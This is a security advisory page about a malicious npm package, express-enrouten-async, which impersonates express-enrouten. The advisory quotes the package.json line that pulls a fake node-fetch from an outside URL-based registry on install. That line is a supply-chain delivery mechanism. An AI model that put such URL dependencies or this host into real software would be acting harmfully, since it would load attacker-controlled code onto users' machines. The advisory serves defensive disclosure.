VYPR

npm · Malicious package advisory

Malware

express-enrouten-async

MAL-2026-4556

Malicious code in express-enrouten-async (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (f944bc544f9368e58a223e76e462ddec4ba325c728a233100182706ad8f0ae0e)
Package name mimics the legitimate `express-enrouten` route-discovery library, but the shipped `index.js` only hardcodes two demo routes rather than implementing automatic route discovery. The malicious mechanism is in `package.json`, which declares `"node-fetch": "https://registry.ctzbg.com/express-enrouten-async/node-fetch"` — a direct URL dependency pointing at a third-party, non-npm registry under a path namespaced to this package. On `npm install`, npm fetches and installs whatever tarball that URL serves as the installer's `node-fetch`, so any code requiring `node-fetch` in the host application loads attacker-controlled, unpinned, mutable bytes from a non-publisher domain. This is dependency-confusion-style supply-chain attack: the lookalike package name lures the install, and the URL-pinned fake `node-fetch` is the delivery vehicle for arbitrary code into the installer's dependency tree.

Compromised versions (2)

  • 1.4.12
  • 1.4.11

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.